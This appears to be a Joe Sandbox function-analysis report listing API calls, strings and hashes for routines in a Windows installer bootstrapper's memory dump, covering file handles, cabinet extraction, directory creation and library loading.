Instruction ID: d312a0569cb2cd1e99332de91ec795b8d847b6de051a8b617b323d646de24bd9
Opcode Fuzzy Hash: cd785597ebf7a4bc0a23482b9824a1f0730549526246bf2ba3c94809959687f0
Instruction Fuzzy Hash: 28310672942635BFEB215F969C49F9F7E68EF04760F114121FD44B7642D7A19C8086E0

Function 000D6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,000C4E11,?,?), ref: 000D6A77
GetCurrentProcess.KERNEL32(?,00000000,?,?,000C4E11,?,?), ref: 000D6A7D
DuplicateHandle.KERNELBASE(00000000,?,?,000C4E11,?,?), ref: 000D6A80
GetLastError.KERNEL32(?,?,000C4E11,?,?), ref: 000D6A8A
CloseHandle.KERNEL32(000000FF,?,000C4E11,?,?), ref: 000D6B03

Strings

burn.filehandle.attached, xrefs: 000D6AD0
Failed to duplicate file handle for attached container., xrefs: 000D6AB8
Failed to append the file handle to the command line., xrefs: 000D6AEB
%ls -%ls=%u, xrefs: 000D6AD7
core.cpp, xrefs: 000D6AAE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 0d95bdc5dfda6d1cc46f4783c3c2ce62d79bcbd0a41be2e15337097efab9aaac
Instruction ID: eacd4d63e1eedd156c61201899ceb6c722fe016d26209f89b0d8c7a886af0b2b
Opcode Fuzzy Hash: 0d95bdc5dfda6d1cc46f4783c3c2ce62d79bcbd0a41be2e15337097efab9aaac
Instruction Fuzzy Hash: 46119A32940329FBCB109BA88C05E9E7BA89F05730F114266F960F73D0D7B19D408BE1

Function 00109AA6 Relevance: 15.1, APIs: 10, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE ref: 00109AA6
GetLastError.KERNEL32 ref: 00109AB2
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00109AE1
RaiseException.KERNEL32(C06D007E,?,00000001,?), ref: 00109AF2
FreeLibrary.KERNEL32(00000000), ref: 00109B0C
GetProcAddress.KERNEL32(00000000,?), ref: 00109B74
GetLastError.KERNEL32 ref: 00109B80
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00109BAF
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 00109BC0
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00109BF7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadReleaseSectionWrite$ErrorExceptionLastLibraryRaise$AddressFreeLoadProc
String ID:
API String ID: 202095176-0
Opcode ID: c2790e0de1f7093dd89ea792a89ee1b87c8d6be83fd8ba72329f22d62e2b38d7
Instruction ID: 1d35dd59adf077967c94398224acbc70c971e692c9ce87015086578dcb74a68f
Opcode Fuzzy Hash: c2790e0de1f7093dd89ea792a89ee1b87c8d6be83fd8ba72329f22d62e2b38d7
Instruction Fuzzy Hash: 78417235900219AFCB11DF94E8A4DAEB7B4FF44320B15416AF981A7391DBB0DD40CB90

Function 00100879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,000C53BD,00000000,?,?,?,?,?,?,?,000D769D,00000000), ref: 00100897
GetLastError.KERNEL32(?,?,?,?,?,?,?,000D769D,00000000), ref: 001008A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,000D769D,00000000), ref: 001008D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,000D769D,00000000), ref: 001008EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,000D769D,00000000), ref: 0010092B

Strings

procutil.cpp, xrefs: 00100919

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: d99b8d070722712dfcd53fc39a4f1496f17c381467893caf7ac2444a3d3965d0
Instruction ID: 633e010544925f5606b5500ddc10e746d49bd4b0a9a3d9b6d6c77dce91451e31
Opcode Fuzzy Hash: d99b8d070722712dfcd53fc39a4f1496f17c381467893caf7ac2444a3d3965d0
Instruction Fuzzy Hash: C121C932D40229EBD7229B958C45B9EBBB8FF14710F118156FD98E7291D7B08E40DBD0

Function 000D6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 000D6B49
CloseHandle.KERNEL32(00000000), ref: 000D6BB9

Strings

Failed to append the file handle to the command line., xrefs: 000D6B75
burn.filehandle.self, xrefs: 000D6B5A, 000D6B8C
%ls -%ls=%u, xrefs: 000D6B61, 000D6B93
Failed to append the file handle to the obfuscated command line., xrefs: 000D6BA7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: 2a337928f309bfd4625cb74cca8b725bb8abe837425e3eb74a60114d467e5b7b
Instruction ID: 556ca372972bb491062027bb76070680941a3559409f371c0a08dac36b955cf4
Opcode Fuzzy Hash: 2a337928f309bfd4625cb74cca8b725bb8abe837425e3eb74a60114d467e5b7b
Instruction Fuzzy Hash: 3311E632600718FBDB205AA8CC45F9F7BA9DB85B34F114366FD24EB3E1D3B1485186A1

Function 00103565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00103574
InterlockedIncrement.KERNEL32(0012B6C8), ref: 00103591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0012B6B8,?,?,?,?,?,?), ref: 001035AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,0012B6B8,?,?,?,?,?,?), ref: 001035B8

Strings

MSXML.DOMDocument, xrefs: 001035B3
Msxml2.DOMDocument, xrefs: 001035A7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 23115ebf0b9bde4f4aa402330ac53505026e3511d0b50bfdae63d66ed4787b49
Instruction ID: 2613cabeb5df38c65c8ad5ed6ac3704757084786a4054456efc5c4053167f669
Opcode Fuzzy Hash: 23115ebf0b9bde4f4aa402330ac53505026e3511d0b50bfdae63d66ed4787b49
Instruction Fuzzy Hash: EDF0E53074813AABC3211B627D49B473E6DEB80B54F100529E8D0E25F0D3E0D9D18BB0

Function 00104A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00104A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00104ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00104AF6
GetLastError.KERNEL32(00000000,0010B7A0,?,00000000,?,00000000,?,00000000), ref: 00104B34
GlobalFree.KERNEL32(00000000), ref: 00104B65

Strings

fileutil.cpp, xrefs: 00104AB8, 00104B11

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 260e66676f9b401a39cdcf560b2c37edd0efae7e2e1013c2fa1e6b41cda197b6
Instruction ID: 072149d7361033dfee27db2bee8850ae6092d8e022b2c25daf0a7e933edab186
Opcode Fuzzy Hash: 260e66676f9b401a39cdcf560b2c37edd0efae7e2e1013c2fa1e6b41cda197b6
Instruction Fuzzy Hash: 6831D8B6E40239EBC7119A998C81FAFBAB8AF44750F114155FE94E72C1DBB1DC0086D4

Function 000E0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 000E0B27
GetLastError.KERNEL32(?,?,?), ref: 000E0B31

Strings

Invalid seek type., xrefs: 000E0ABD
cabextract.cpp, xrefs: 000E0B55
Failed to move file pointer 0x%x bytes., xrefs: 000E0B62

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 46d09c070340ef5924d4a673206bc7254d4f899ef0627ceae4a42257a84571bb
Instruction ID: 5a9ce67d131fcefe046a75bd1f704d234d4f1d037071157e421e2304bec6c242
Opcode Fuzzy Hash: 46d09c070340ef5924d4a673206bc7254d4f899ef0627ceae4a42257a84571bb
Instruction Fuzzy Hash: C131D471A4025AEFCB15CF99C884EAEB7B9FF04724B048225FD14A7651D3B0ED908B91

Function 000C4115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?), ref: 000C4123
GetLastError.KERNEL32(?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?,00000000,00000000), ref: 000C4131
CreateDirectoryW.KERNEL32(?,840F01E8,000C5489,?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?,00000000), ref: 000C419A
GetLastError.KERNEL32(?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?,00000000,00000000), ref: 000C41A4

Strings

dirutil.cpp, xrefs: 000C41D4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: b30ba625f4e274f4ecacf3e8c9bf5e516a918442271698eb47df3a13310153cd
Instruction ID: 2d7da8ef2625cb286cfaeab64ee004ad265600bbc0c705f969af8c597605eaa7
Opcode Fuzzy Hash: b30ba625f4e274f4ecacf3e8c9bf5e516a918442271698eb47df3a13310153cd
Instruction Fuzzy Hash: 6F110236A0433596D7721BA55CA0F7FA6A4FF71B61F194029FDC4EA250E3608CD082D0

Function 000C56A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,000C6595,000C6595,?,000C563D,?,?,00000000), ref: 000C56E5
GetLastError.KERNEL32(?,000C563D,?,?,00000000,?,?,000C6595,?,000C7F02,?,?,?,?,?), ref: 000C5714

Strings

Failed to compare strings., xrefs: 000C5742
version.dll, xrefs: 000C56D7
variable.cpp, xrefs: 000C5738

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: b714b814ec583b7f9eb87131b3be9c1f509d9b00a20fc7652489a47588d95f66
Instruction ID: 17be4ec181d7f26d5279be762c60a9189f83563adc6bca3b19b4e27b4c491b2a
Opcode Fuzzy Hash: b714b814ec583b7f9eb87131b3be9c1f509d9b00a20fc7652489a47588d95f66
Instruction Fuzzy Hash: 0921073A648915EBC7148F98DD44F5EB7A4EB45721B21031DF964AB3D0EA70FD818690

Function 00100A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,000C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00100A38
GetLastError.KERNEL32(?,?,000C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00100A46
GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00100A8B
GetLastError.KERNEL32(?,?,000C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00100A95

Strings

procutil.cpp, xrefs: 00100A6A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 8fe653c7f0b71d4b774655add47f1b0f148a923151fff4705da19e425ac56132
Instruction ID: 50cc0bf48606413ca75d855187b08402d61575b733ad223c442991dd56014f18
Opcode Fuzzy Hash: 8fe653c7f0b71d4b774655add47f1b0f148a923151fff4705da19e425ac56132
Instruction Fuzzy Hash: F3118237E45736E7CB229B948D08B9F7AA4EB0C760F128255FD94AB3C0D3B09E4096D1

Function 000E09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000E0A19,?,?,?), ref: 000E1434
Part of subcall function 000E140C: GetLastError.KERNEL32(?,000E0A19,?,?,?), ref: 000E143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 000E0A27
GetLastError.KERNEL32 ref: 000E0A31

Strings

cabextract.cpp, xrefs: 000E0A55
Failed to read during cabinet extraction., xrefs: 000E0A5F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 17ff0c92e780b6ad9bbe1231a5aa48e8df5e3c2b4b178e1423187055985f6162
Instruction ID: 456e645edb28e607841aa89b12cc39a48a315b471b3a1f33cc40a0c19b57c9cb
Opcode Fuzzy Hash: 17ff0c92e780b6ad9bbe1231a5aa48e8df5e3c2b4b178e1423187055985f6162
Instruction Fuzzy Hash: BF112136A00269BFCB219F96DC04E8E3FA8FF08720B054125FD04A7281C7719950C7D1

Function 000E140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000E0A19,?,?,?), ref: 000E1434
GetLastError.KERNEL32(?,000E0A19,?,?,?), ref: 000E143E

Strings

cabextract.cpp, xrefs: 000E1462
Failed to move to virtual file pointer., xrefs: 000E146C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 726f52ca94f2bdb91d7ca1272ea0e692b34b029ef68641489deb4a9caa4c1adc
Instruction ID: 18a7393211cbb452fd1da37f31bfef826e5aa0c620e74e490067d68203ad7d5e
Opcode Fuzzy Hash: 726f52ca94f2bdb91d7ca1272ea0e692b34b029ef68641489deb4a9caa4c1adc
Instruction Fuzzy Hash: D301A27794167ABBCB265A968C08ECBFF65FF007707118125FD186A691DB319C50C6D0

Function 00103EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00103F73
GetLastError.KERNEL32 ref: 00103FD6

Strings

fileutil.cpp, xrefs: 00103FFA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: 2ed88ec599fc512ccdafd64f745ef2ab85868010001b08d60aa209ed876ad1cd
Instruction ID: 03e6b10e79289036c6720520bd82cd2b8d24fca5c4c8f61267f3afa7bacff56b
Opcode Fuzzy Hash: 2ed88ec599fc512ccdafd64f745ef2ab85868010001b08d60aa209ed876ad1cd
Instruction Fuzzy Hash: 10316171E0026A9FDB25CF14C9807EA77B8FB04751F0040AAFA98E7280D7F49EC48A95

Function 00104E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00103F9A,?,?,?), ref: 00104E5E
GetLastError.KERNEL32(?,?,00103F9A,?,?,?), ref: 00104E68

Strings

fileutil.cpp, xrefs: 00104E91

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 44fd51715b12eb7e810bbd0d3f125701258b19b5c87e9ac5f8b45b1c128d13e9
Instruction ID: a6e0427ba1fc2e8432607fd4b635c962ebdc94f549b89b2a4b8e7272b450e7e0
Opcode Fuzzy Hash: 44fd51715b12eb7e810bbd0d3f125701258b19b5c87e9ac5f8b45b1c128d13e9
Instruction Fuzzy Hash: 61F06D73A01229ABD7208E9ADC85EEFBB6DFB44761F014115FE44E7180D7B1AE0086E0

Function 0010490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,000D8770,00000000,00000000,00000000,00000000,00000000), ref: 00104925
GetLastError.KERNEL32(?,?,?,000D8770,00000000,00000000,00000000,00000000,00000000), ref: 0010492F

Strings

fileutil.cpp, xrefs: 00104953

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: fba6c8cc07a288c20a74bc0a57bd5427a60c67677bc7bf0bbbfb7c44ff9700d9
Instruction ID: 1278bd3eeea02c82bd8c430304475d1e99b7838f041b1632194052ae3a5ea1c6
Opcode Fuzzy Hash: fba6c8cc07a288c20a74bc0a57bd5427a60c67677bc7bf0bbbfb7c44ff9700d9
Instruction Fuzzy Hash: AEF086B6604129ABDB158F85DC45EAB7FA8EF08764B014164BE8497251E771DC10D7E0

Function 000C3838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000C3877
GetLastError.KERNEL32 ref: 000C3881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 000C38EA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: e8ba858878fa35e32c07d35f0726bda267a82adc8dfe2881d73c445061480e5a
Instruction ID: d1e4d4f1caf972277554b2a70cbcefab51f0764f6bb573921141ae056abc11d5
Opcode Fuzzy Hash: e8ba858878fa35e32c07d35f0726bda267a82adc8dfe2881d73c445061480e5a
Instruction Fuzzy Hash: 0121C5B2D1133DA7DB209B659C45F9E77A8DB44710F1141A9BE14F7282DA70DE4487E0

Function 000C3A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,000C3BB6,00000000,?,000C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,000C13B8), ref: 000C3A20
RtlFreeHeap.NTDLL(00000000,?,000C3BB6,00000000,?,000C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,000C13B8,000001C7,00000100), ref: 000C3A27
GetLastError.KERNEL32(?,000C3BB6,00000000,?,000C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,000C13B8,000001C7,00000100,?), ref: 000C3A31

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

